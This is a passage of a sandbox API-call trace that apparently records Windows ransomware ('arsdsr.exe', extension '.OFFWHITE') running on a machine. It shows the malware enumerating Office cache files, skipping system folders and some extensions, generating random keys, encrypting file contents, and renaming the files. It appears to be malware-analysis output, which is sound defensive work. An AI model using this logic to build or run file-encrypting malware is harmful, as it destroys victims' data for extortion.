(lpString1=".msi", lpString2=".pif") returned -1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0087.767] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0087.767] lstrcmpiW (lpString1="Office32WW.xml", lpString2=".") returned 1 [0087.767] lstrcmpiW (lpString1="Office32WW.xml", lpString2="..") returned 1 [0087.767] lstrcmpiW (lpString1="Office32WW.xml", lpString2="...") returned 1 [0087.767] lstrcmpiW (lpString1="Office32WW.xml", lpString2="windows") returned -1 [0087.767] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$recycle.bin") returned 1 [0087.767] lstrcmpiW (lpString1="Office32WW.xml", lpString2="rsa") returned -1 [0087.767] lstrcmpiW (lpString1="Office32WW.xml", lpString2="ntuser.dat") returned 1 [0087.768] lstrcmpiW (lpString1="Office32WW.xml", lpString2="programdata") returned -1 [0087.768] lstrcmpiW (lpString1="Office32WW.xml", lpString2="appdata") returned 1 [0087.768] lstrcmpiW (lpString1="Office32WW.xml", lpString2="program files") returned -1 [0087.768] lstrcmpiW (lpString1="Office32WW.xml", lpString2="program files (x86)") returned -1 [0087.768] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.768] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0087.768] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.768] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.768] PathFindExtensionW (pszPath="Office32WW.xml") returned=".xml" [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.768] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.768] lstrcmpiW (lpString1="Office32WW.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0087.768] GetProcessHeap () returned 0x500000 [0087.768] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d88 [0087.769] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.769] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=4274) returned 1 [0087.769] GetProcessHeap () returned 0x500000 [0087.769] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.769] GetProcessHeap () returned 0x500000 [0087.769] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.769] GetProcessHeap () returned 0x500000 [0087.769] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.769] GetProcessHeap () returned 0x500000 [0087.769] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.769] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.769] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.769] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.769] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.769] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.769] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.769] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.770] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.770] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.770] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.770] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.770] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.770] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.770] SetLastError (dwErrCode=0x0) [0087.770] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.832] GetLastError () returned 0x0 [0087.832] GetLastError () returned 0x0 [0087.832] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.832] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.832] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.832] WriteFile (in: hFile=0x21c, lpBuffer=0x547d88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d88*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.832] GetProcessHeap () returned 0x500000 [0087.832] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10b2) returned 0x5557b0 [0087.832] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.832] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x10b2, lpOverlapped=0x0) returned 1 [0087.834] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.834] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x10b2, lpOverlapped=0x0) returned 1 [0087.834] GetProcessHeap () returned 0x500000 [0087.834] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0087.834] CloseHandle (hObject=0x21c) returned 1 [0087.836] GetProcessHeap () returned 0x500000 [0087.836] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.836] GetProcessHeap () returned 0x500000 [0087.836] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.836] GetProcessHeap () returned 0x500000 [0087.836] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.836] GetProcessHeap () returned 0x500000 [0087.836] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.837] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0087.837] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE" [0087.837] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.offwhite")) returned 1 [0087.837] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0087.837] lstrcmpiW (lpString1="ose.exe", lpString2=".") returned 1 [0087.837] lstrcmpiW (lpString1="ose.exe", lpString2="..") returned 1 [0087.837] lstrcmpiW (lpString1="ose.exe", lpString2="...") returned 1 [0087.838] lstrcmpiW (lpString1="ose.exe", lpString2="windows") returned -1 [0087.838] lstrcmpiW (lpString1="ose.exe", lpString2="$recycle.bin") returned 1 [0087.838] lstrcmpiW (lpString1="ose.exe", lpString2="rsa") returned -1 [0087.838] lstrcmpiW (lpString1="ose.exe", lpString2="ntuser.dat") returned 1 [0087.838] lstrcmpiW (lpString1="ose.exe", lpString2="programdata") returned -1 [0087.838] lstrcmpiW (lpString1="ose.exe", lpString2="appdata") returned 1 [0087.838] lstrcmpiW (lpString1="ose.exe", lpString2="program files") returned -1 [0087.838] lstrcmpiW (lpString1="ose.exe", lpString2="program files (x86)") returned -1 [0087.838] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.838] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="ose.exe" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" [0087.838] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.838] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.838] PathFindExtensionW (pszPath="ose.exe") returned=".exe" [0087.838] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0087.838] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2=".") returned 1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="..") returned 1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="...") returned 1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="windows") returned -1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="$recycle.bin") returned 1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="rsa") returned -1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="ntuser.dat") returned 1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="programdata") returned -1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="appdata") returned 1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="program files") returned -1 [0087.838] lstrcmpiW (lpString1="osetup.dll", lpString2="program files (x86)") returned -1 [0087.838] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.839] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="osetup.dll" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" [0087.839] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.839] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.839] PathFindExtensionW (pszPath="osetup.dll") returned=".dll" [0087.839] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0087.839] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0087.839] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0087.839] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0087.839] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0087.839] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0087.839] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0087.839] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0087.839] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2=".") returned 1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="..") returned 1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="...") returned 1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="windows") returned -1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$recycle.bin") returned 1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="rsa") returned -1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="ntuser.dat") returned 1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="programdata") returned -1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="appdata") returned 1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="program files") returned -1 [0087.839] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="program files (x86)") returned -1 [0087.839] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.839] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="OWOW32WW.cab" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0087.840] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.840] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.840] PathFindExtensionW (pszPath="OWOW32WW.cab") returned=".cab" [0087.840] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0087.840] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0087.840] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0087.840] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2=".") returned 1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="..") returned 1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="...") returned 1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="windows") returned -1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$recycle.bin") returned 1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="rsa") returned -1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="ntuser.dat") returned 1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="programdata") returned -1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="appdata") returned 1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="program files") returned -1 [0087.840] lstrcmpiW (lpString1="PidGenX.dll", lpString2="program files (x86)") returned -1 [0087.840] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.840] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="PidGenX.dll" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0087.840] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.840] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.840] PathFindExtensionW (pszPath="PidGenX.dll") returned=".dll" [0087.840] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0087.840] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0087.840] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0087.840] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0087.841] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0087.841] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0087.841] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0087.841] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0087.841] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="...") returned 1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="windows") returned -1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$recycle.bin") returned 1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="rsa") returned -1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="ntuser.dat") returned 1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="programdata") returned -1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="appdata") returned 1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="program files") returned -1 [0087.841] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="program files (x86)") returned -1 [0087.841] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.841] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="pkeyconfig-office.xrm-ms" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0087.841] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.841] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.841] PathFindExtensionW (pszPath="pkeyconfig-office.xrm-ms") returned=".xrm-ms" [0087.841] lstrcmpiW (lpString1=".xrm-ms", lpString2=".exe") returned 1 [0087.841] lstrcmpiW (lpString1=".xrm-ms", lpString2=".log") returned 1 [0087.841] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cab") returned 1 [0087.841] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cmd") returned 1 [0087.841] lstrcmpiW (lpString1=".xrm-ms", lpString2=".com") returned 1 [0087.841] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cpl") returned 1 [0087.841] lstrcmpiW (lpString1=".xrm-ms", lpString2=".ini") returned 1 [0087.841] lstrcmpiW (lpString1=".xrm-ms", lpString2=".dll") returned 1 [0087.842] lstrcmpiW (lpString1=".xrm-ms", lpString2=".url") returned 1 [0087.842] lstrcmpiW (lpString1=".xrm-ms", lpString2=".ttf") returned 1 [0087.842] lstrcmpiW (lpString1=".xrm-ms", lpString2=".mp3") returned 1 [0087.842] lstrcmpiW (lpString1=".xrm-ms", lpString2=".pif") returned 1 [0087.842] lstrcmpiW (lpString1=".xrm-ms", lpString2=".mp4") returned 1 [0087.842] lstrcmpiW (lpString1=".xrm-ms", lpString2=".OFFWHITE") returned 1 [0087.842] lstrcmpiW (lpString1=".xrm-ms", lpString2=".msi") returned 1 [0087.842] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.842] GetProcessHeap () returned 0x500000 [0087.842] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d98 [0087.842] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.843] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=715834) returned 1 [0087.843] GetProcessHeap () returned 0x500000 [0087.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.843] GetProcessHeap () returned 0x500000 [0087.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.843] GetProcessHeap () returned 0x500000 [0087.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.843] GetProcessHeap () returned 0x500000 [0087.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.844] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.844] SystemFunction036 (in: RandomBuffer=0x548790, 